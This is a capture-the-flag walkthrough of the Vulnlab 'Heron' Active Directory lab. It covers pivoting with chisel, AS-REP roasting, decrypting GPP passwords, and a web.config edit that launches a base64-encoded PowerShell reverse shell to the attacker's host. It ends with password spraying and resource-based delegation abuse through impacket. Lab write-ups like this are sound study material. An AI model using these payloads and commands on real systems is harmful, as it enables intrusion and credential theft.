Heron from vulnlab, had a linux jump server access to domain controller, using chisel for socks proxy, enumerating the internal website for domain users and performing AS-REP roasting, decrypting GPP password from the sysvol share, leading to smb share having write access to web.config, gaining a shell by using AspNetCoreModule for executing powershell commands which lead to finding linux admin’s credentials, reusing the same password that will lead to another user which has WriteAccountRestrictions on dc that leads to resource based delegation
Jump server
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 10:a0:bd:2a:81:3d:37:5d:23:75:c8:d2:83:bf:2a:23 (ECDSA)
|_ 256 bd:32:29:26:4d:41:d7:56:01:37:bc:10:0c:de:45:24 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThe server had only port 22 with the credentials provided on vulnlab wiki as this chained machine is an assumed breach scenario pentest:Heron123!
Checking for privileges, we can’t use sudo as this user isn’t in sudoers group
From the user’s directory, two users svc-web-accounting and svc-web-accounting-d belong to heron.vl , having only usernames there's only as-rep roasting we could try if these domain users have pre-authentication not required, this could give us the as-rep hash so we can try cracking to get the plain text password.
Checking the internal ports, there’s only ssh here
To proceed with as-rep roasting we need to perform pivoting as we directly cannot reach domain controller, this can be done with either chisel or ligolo-ng, I’ll be using chisel since we only need to access one host, if it were a network then ligolog would have been a better option for that
chisel server --reverse -p 3000
chisel client 10.8.0.136:3000 R:socksWith Get-NPUsers to check the pre-authentication not required, both of the users had that required
Bruteforcing the SIDs with guest account was not possible too as that account was disabled
Visiting the web page, we have a pager about heron corp with three more usernames at the bottom
Trying to check pre-auth again with these users, we’ll get samuel.davies’s hash and cracking it with hashcat
Decrypting GPP password
Enumerating the shares, samuel had read access on sysvol , home and write on transfer$ which seem to be only two interesting shares right now
Then transfer share was empty, home had bunch of user directories including samuel which was also didn’t had anything
However, from SYSVOL share in one of the policy directory, we can find encrypted password for svc-web-accounting
Decrypting this with GPP-decrypt python script
GPP password can also be recovered through nxc/cme with gpp_password module
proxychains nxc smb 10.10.196.37 -u 'samuel.davies' -p 'pass' -M gpp_passwordChecking the access on smb shares with svc-web-accounting-d, there’s write access on accounting share
The accounting share has the application files including the web.config
Getting a shell through web.config
Since we have write access to web.config we can edit that and execute system commands through AspNetCoreModule but this method is destructive as it replaces the config file and can cause application to not function as in this scenario the application is working through the use of AccountingApp.dll in the config file
But before we attempt this we need to first figure out where config is being hosted as from the previous website we found it wasn’t there, from the share name this hints us to use accounting as vhost
This site will ask for credentials where svc-web-accounting-d’s creds will work
The data here was being reflected from the dll which can be analyzed by either ILSpy or DNSpy
Following this article https://soroush.me/blog/tag/rce/, to replace the path with any which does not exist, changing the processpath to be powershell and in the arguments placing base64 encoded reverse shell to receive on jump server
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="powershell" arguments="-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADAALgAxADMANgAiACwAMgAyADIAMgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->Now deleting the web.config and replacing it with our modified one then making a request to the webpage with /execute.now
After getting a shell, running bloodhound to enumerate the domain
proxychains bloodhound-python -d 'heron.vl' -u 'svc-web-accounting-d' -p 'password' -c all -ns 10.10.237.21But from bloodhound, it didn’t showed any path leading to privilege escalation/lateral movement
Escalating privileges on jump server
Enumerating C:\Windows, we’ll find scripts folder which is unusual to be there, ssh. ps1 file having credentials to_local user
Switching to user and escalating privileges to root user
From here we can only do much about reading the NThash of frajmp from /etc/krb5.keytab
Since we have password of _local, we can try password spraying on domain users which will work on Julian.Pratt
We can’t login directly on domain controller since it requires non admins to be in remote desktop group, home directory can be access through home$ share
From here we can grab the shortcut files for putty sessions from where we’ll get the password of adm_prju
Abusing Resource Based Delegation
Checking for paths for gaining domain, this user is in Admins_T1 group which has WriteAccountRestrictions acl on domain controller, which essentially is similar to GenericWrite or WriteProperty that can allow to edit msDS-AllowedToActOnBehalfOfOtherIdentity adding a machine account for which we have password for abusing resource based delegation (RBCD)
We can do this attack in two ways, since we have the NThash of frajmp, we can append that account in dc’s property or we can utilize a user account without having any SPN by replacing the password with it’s TGT session and combining S4U2Self and U2U protocols to abuse but this method is quite destructive and must be avoided unless there’s a test account
Going with the machine account approach, by first editing the property
proxychains impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -dc-ip '10.10.153.149' -action 'write' 'heron.vl'/'adm_prju':'passowrd'proxychains impacket-getST -spn 'cifs/MUCDC' -impersonate _admin -dc-ip '10.10.153.149' 'heron.vl/frajmp$' -hashes ':hash'